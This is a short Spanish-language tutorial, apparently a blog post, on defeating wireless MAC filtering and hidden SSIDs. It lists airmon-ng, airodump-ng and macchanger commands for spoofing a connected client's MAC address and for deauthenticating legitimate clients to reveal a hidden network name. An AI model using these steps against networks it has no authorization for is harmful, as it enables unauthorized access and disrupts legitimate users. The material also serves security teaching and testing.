Introducción

Una de las viejas costumbres que teníamos como primera defensa a la hora de proteger nuestras redes inalámbricas era realizar un filtrado MAC a los clientes conectados, de forma que por mucho que tuvieras la contraseña, tan solo iban a ser capaces de tener acceso a la red aquellos usuarios que estuvieran en la whitelist. Otra vieja costumbre que siguen utilizando los usuarios, es ocultar el SSID para que aquellos que no conozcan el nombre, no puedan intentar autenticarse en el AP y, en esta guía, veremos lo inútiles que resultan ambas medidas a la hora de realizar un ataque.

 

Filtrado MAC

Pasos:
  1. Tarjeta de red en modo monitor
  2. Monitorización de la red objetivo
  3. Identificación de los clientes conectados
  4. Suplantación de la MAC del cliente objetivo

 

Tarjeta de red en modo monitor

Consultamos las interfaces disponibles:

sudo ifconfig

Seleccionamos el interfaz de red:

sudo airmon-ng start <interfaz_de_red>
Monitorización de la red objetivo

Iniciamos la monitorización:

sudo airodump-ng <monitor>

Seleccionamos los datos de la red objetivo:

  • Canal en el que transmite el AP
  • BSSID
Identificación de los clientes conectados

Cambiamos el canal de monitorización:

sudo iwconfig <monitor> channel <canal_de_la_red>

Nos centramos en los clientes conectados a dicha red:

sudo airodump-ng -c <canal> --bssid <bssid_del_AP> <monitor>
Suplantación de la MAC del cliente objetivo

Con ctrl + C paramos la monitorización es escogemos la MAC del objetivo.

Desactivamos la interfaz de red:

sudo ifconfig <interfaz> down

Suplantamos la MAC del objetivo con macchanger:

sudo macchanger -m <MAC_cliente> <interfaz>

Reactivamos la interfaz de red:

sudo ifconfig <interfaz> up

Deautenticamos al cliente legítimo como vimos en la guía anterior DoS a un AP

Redes ocultas

Para el descubrimiento de un SSID oculto, tan solo debemos deautenticar a los clientes y esperar la captura del un handshake (ya que en este tipo de paquete el SSID aparece) otra vez, nos remitimos a la guía DoS a un AP

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *